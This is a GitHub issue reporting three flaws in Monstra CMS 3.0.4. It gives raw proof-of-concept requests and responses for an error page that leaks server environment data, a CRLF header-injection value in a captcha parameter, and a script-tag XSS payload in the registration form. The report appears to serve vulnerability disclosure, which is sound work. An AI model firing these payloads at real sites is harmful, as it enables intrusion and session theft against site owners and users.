Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Monstra CMS V3.0.4 allows attachers obtain sensitive information #4

Open
howchen opened this issue Sep 7, 2018 · 0 comments
Open

Comments

@howchen
Copy link
Owner

howchen commented Sep 7, 2018

part 1 sensitive information leakage

request:
http://site.com/monstra-master/libraries/Gelato/ErrorHandler/Resources/Views/Errors/exception.php

the response error message obtains sensitive information

PATH | string(955) "C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files\Intel\Intel(R) Management Engine Components\IPT;D:\install\jdk1.8\bin;D:\install\apache-maven-3.5.3\bin;D:\install\gradle-4.4\bin;D:\install\apache-ant-1.10.4\bin;C:\Python27;C:\Program Files\dotnet\;C:\Program Files\Microsoft SQL Server\130\Tools\Binn\;C:\Program Files\Git\bin;D:\tools\sqlmapproject-sqlmap-a831865;C:\Users\c00450407\AppData\Local\Programs\Python\Python37-32\Scripts\;C:\Users\c00450407\AppData\Local\Programs\Python\Python37-32\;C:\Users\c00450407\AppData\Local\Microsoft\WindowsApps;C:\Users\c00450407\AppData\Local\Programs\Fiddler"
-- | --
SystemRoot | string(10) "C:\Windows"
COMSPEC | string(27) "C:\Windows\system32\cmd.exe"
PATHEXT | string(53) ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC"
WINDIR | string(10) "C:\Windows"
SERVER_SIGNATURE | string(0) ""
SERVER_SOFTWARE | string(47) "Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45"
SERVER_NAME | string(9) "localhost"
SERVER_ADDR | string(9) "127.0.0.1"
SERVER_PORT | string(4) "8899"
REMOTE_ADDR | string(9) "127.0.0.1"
DOCUMENT_ROOT | string(35) "D:/install/phpstudy/PHPTutorial/WWW"
REQUEST_SCHEME | string(4) "http"
CONTEXT_PREFIX | string(0) ""
CONTEXT_DOCUMENT_ROOT | string(35) "D:/install/phpstudy/PHPTutorial/WWW"
SERVER_ADMIN | string(12) "admin@php.cn"
SCRIPT_FILENAME | string(117) "D:/install/phpstudy/PHPTutorial/WWW/monstra-master/libraries/Gelato/ErrorHandler/Resources/Views/Errors/exception.php"

part 2 http header injection

Request:
/monstra-master/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20mycookie=hell

HTTP/1.1 200 OK
Date: Fri, 07 Sep 2018 06:50:53 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
X-Powered-By: PHP/5.4.45
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cryptcookietest=1
Content-Length: 215
Connection: close
Content-Type: text/html; charset=UTF-8

<b>Warning</b>:  Header may not contain more than a single header, new line detected in <b>D:\install\phpstudy\PHPTutorial\WWW\monstra-master\plugins\captcha\crypt\cryptographp.php</b> on line <b>5</b><br />

part 3 XSS

request by post

POST /monstra-master/users/registration HTTP/1.1
Host: localhost:8899
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 391
Cookie: sitevisitscookie=1; dmid=d3c104a4-849c-463e-a9c6-6921467cda41; BkGOp9578O_think_template=default; finecms-admin-login=admin; PHPSESSID=f24ec5cd673j71ttpd5nllp2i2
Connection: close
Upgrade-Insecure-Requests: 1

csrf=c9948680570e923cc610543c9c08ed2ed088ad9c&login=test3&password="><script>alert('1')</script>&email=test3%40163.com&answer=EATT&register=Register
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant